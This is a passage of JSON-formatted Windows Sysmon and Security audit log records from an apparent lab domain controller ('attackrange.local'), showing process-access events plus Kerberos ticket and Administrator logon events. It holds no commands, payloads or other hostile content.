06:55:18.025","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D6-5F25-0000-00106A320800}","TargetProcessId":"4848","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5604,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.025\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.025","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5605,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.025\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.025","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5606,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.025\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.025","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5607,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.025\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.025","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5608,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.025\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.025","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220592,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220593,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{BA6138E8-AAC0-A83A-70FC-5DED811F88B9}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{BA6138E8-AAC0-A83A-70FC-5DED811F88B9}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220594,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{BA6138E8-AAC0-A83A-70FC-5DED811F88B9}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{BA6138E8-AAC0-A83A-70FC-5DED811F88B9}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220595,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x83183\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{BA6138E8-AAC0-A83A-70FC-5DED811F88B9}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x83183","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{BA6138E8-AAC0-A83A-70FC-5DED811F88B9}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
